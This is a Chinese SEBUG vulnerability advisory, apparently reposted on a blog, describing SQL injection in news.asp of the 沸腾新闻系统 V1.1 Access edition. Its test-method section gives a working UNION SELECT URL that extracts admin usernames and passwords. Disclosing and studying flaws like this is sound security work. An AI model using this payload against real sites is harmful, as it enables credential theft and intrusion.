沸腾新闻系统 V1.1 Access版 Finish(SP2) 注入漏洞

2009, September 30, 7:49 PM. 漏洞集研
Submitted by admin
SEBUG-Appdir:沸腾新闻系统
发布时间:2007-05-09
影响版本:
V1.1 Access版 Finish(SP2) 注入利用
漏洞描述:
沸腾新闻系统是一套asp的cms系统
news.asp对相关参数过滤不严,存在sql注入漏洞。
<*参考
*>
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
+ News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2
SEBUG安全建议:
暂无

关注官方补丁
// sebug.net [2009-09-30]
Tags: 沸腾

« 上一篇 | 下一篇 »

只显示10条记录相关文章
沸腾新闻系统v0.45拿SHELL (浏览: 8558, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):